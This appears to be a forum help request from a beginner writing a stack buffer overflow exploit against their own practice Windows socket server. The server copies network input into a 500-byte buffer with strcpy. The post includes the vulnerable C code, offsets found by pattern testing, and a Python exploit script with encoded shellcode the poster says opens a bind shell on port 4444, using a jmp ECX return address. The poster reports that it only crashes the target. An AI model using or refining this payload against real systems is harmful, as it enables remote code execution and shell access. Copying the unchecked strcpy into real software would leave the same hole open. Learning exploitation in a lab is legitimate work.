I am bit new to exploitation.But I know the basics.I have to write exploit for the following C code
---------------------------------------------------
#include <iostream>
#include <winsock.h>
#include <windows.h>

//load windows socket
#pragma comment(lib, "wsock32.lib")

//Define Return Messages
#define SS_ERROR 1
#define SS_OK 0


void pr( char *str)
{
char buf[500]="";
strcpy(buf,str);
}
void sError(char *str)
{
MessageBox (NULL, str, "socket Error" ,MB_OK);
WSACleanup();
}


int main(int argc, char **argv)
{



WORD sockVersion;
WSADATA wsaData;

int rVal;
char Message[5000]="";
char buf[2000]="";

u_short LocalPort;
LocalPort = 200;

//wsock32 initialized for usage
sockVersion = MAKEWORD(1,1);
WSAStartup(sockVersion, &wsaData);

//create server socket
SOCKET serverSocket = socket(AF_INET, SOCK_STREAM, 0);

if(serverSocket == INVALID_SOCKET)
{
sError("Failed socket()");
return SS_ERROR;
}

SOCKADDR_IN sin;
sin.sin_family = PF_INET;
sin.sin_port = htons(LocalPort);
sin.sin_addr.s_addr = INADDR_ANY;

//bind the socket
rVal = bind(serverSocket, (LPSOCKADDR)&sin, sizeof(sin));
if(rVal == SOCKET_ERROR)
{
sError("Failed bind()");
WSACleanup();
return SS_ERROR;
}

//get socket to listen
rVal = listen(serverSocket, 10);
if(rVal == SOCKET_ERROR)
{
sError("Failed listen()");
WSACleanup();
return SS_ERROR;
}

//wait for a client to connect
SOCKET clientSocket;
clientSocket = accept(serverSocket, NULL, NULL);
if(clientSocket == INVALID_SOCKET)
{
sError("Failed accept()");
WSACleanup();
return SS_ERROR;
}

int bytesRecv = SOCKET_ERROR;
while( bytesRecv == SOCKET_ERROR )
{
//receive the data that is being sent by the client max limit to 5000 bytes.
bytesRecv = recv( clientSocket, Message, 5000, 0 );

if ( bytesRecv == 0 || bytesRecv == WSAECONNRESET )
{
printf( "\nConnection Closed.\n");
break;
}
}

//Pass the data received to the function pr
pr(Message);

//close client socket
closesocket(clientSocket);
//close server socket
closesocket(serverSocket);

WSACleanup();

return SS_OK;
}
----------------------------------------------------

I complied the code on decpp on windows xp sp2 (so no stack protection canarie)
After sending a pattern I find out that ECX points to the first character of our input eip overwritten at 524 bytes.
ESP points to string at the 528 character

so I find a jmp ECX.
and create a pattern like [AAA...524][BBBB][CCCC..]
I find EIP overwritten with BBBB
So in explot I replace BBBB with the address of JMP ECX

So I send the following exploit

C:>python exploit.py|nc localhost 200
exploit.py
-------------------------------------------------------------------------

buffer = '\x90' * 100


buffer += "\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\ x81\x73\x13\x85"
buffer += "\x3f\x2a\xbd\x83\xeb\xfc\xe2\xf4\x79\x55\xc1\xf0\ x6d\xc6\xd5\x42"
buffer += "\x7a\x5f\xa1\xd1\xa1\x1b\xa1\xf8\xb9\xb4\x56\xb8\ xfd\x3e\xc5\x36"
buffer += "\xca\x27\xa1\xe2\xa5\x3e\xc1\xf4\x0e\x0b\xa1\xbc\ x6b\x0e\xea\x24"
buffer += "\x29\xbb\xea\xc9\x82\xfe\xe0\xb0\x84\xfd\xc1\x49\ xbe\x6b\x0e\x95"
buffer += "\xf0\xda\xa1\xe2\xa1\x3e\xc1\xdb\x0e\x33\x61\x36\ xda\x23\x2b\x56"
buffer += "\x86\x13\xa1\x34\xe9\x1b\x36\xdc\x46\x0e\xf1\xd9\ x0e\x7c\x1a\x36"
buffer += "\xc5\x33\xa1\xcd\x99\x92\xa1\xfd\x8d\x61\x42\x33\ xcb\x31\xc6\xed"
buffer += "\x7a\xe9\x4c\xee\xe3\x57\x19\x8f\xed\x48\x59\x8f\ xda\x6b\xd5\x6d"
buffer += "\xed\xf4\xc7\x41\xbe\x6f\xd5\x6b\xda\xb6\xcf\xdb\ x04\xd2\x22\xbf"
buffer += "\xd0\x55\x28\x42\x55\x57\xf3\xb4\x70\x92\x7d\x42\ x53\x6c\x79\xee"
buffer += "\xd6\x6c\x69\xee\xc6\x6c\xd5\x6d\xe3\x57\x3b\xe1\ xe3\x6c\xa3\x5c"
buffer += "\x10\x57\x8e\xa7\xf5\xf8\x7d\x42\x53\x55\x3a\xec\ xd0\xc0\xfa\xd5"
buffer += "\x21\x92\x04\x54\xd2\xc0\xfc\xee\xd0\xc0\xfa\xd5\ x60\x76\xac\xf4"
buffer += "\xd2\xc0\xfc\xed\xd1\x6b\x7f\x42\x55\xac\x42\x5a\ xfc\xf9\x53\xea"
buffer += "\x7a\xe9\x7f\x42\x55\x59\x40\xd9\xe3\x57\x49\xd0\ x0c\xda\x40\xed"
buffer += "\xdc\x16\xe6\x34\x62\x55\x6e\x34\x67\x0e\xea\x4e\ x2f\xc1\x68\x90"
buffer += "\x7b\x7d\x06\x2e\x08\x45\x12\x16\x2e\x94\x42\xcf\ x7b\x8c\x3c\x42"
buffer += "\xf0\x7b\xd5\x6b\xde\x68\x78\xec\xd4\x6e\x40\xbc\ xd4\x6e\x7f\xec"
buffer += "\x7a\xef\x42\x10\x5c\x3a\xe4\xee\x7a\xe9\x40\x42\ x7a\x08\xd5\x6d"
buffer += "\x0e\x68\xd6\x3e\x41\x5b\xd5\x6b\xd7\xc0\xfa\xd5\ x75\xb5\x2e\xe2"
buffer += "\xd6\xc0\xfc\x42\x55\x3f\x2a\xbd"

buffer += '\x90' * 100
buffer += '\xC3\x2C\x82\x77' #jmp ECX
buffer += '\x90'*100

print buffer


#jmp eax 77822CC3,7C85D2F4 shellcode size 324 eip overwrites at 524
-----------------------------------------------------------
The above shellcode is for tcp connect opens a port at 4444.I have tested the shellcode.It works fine .
But I dont find the exploit working.
I simply crashes the program.
Please suggest me why so.
I have tested with some other shellcodes also like calculator.exe still not working
Please help as soon as possible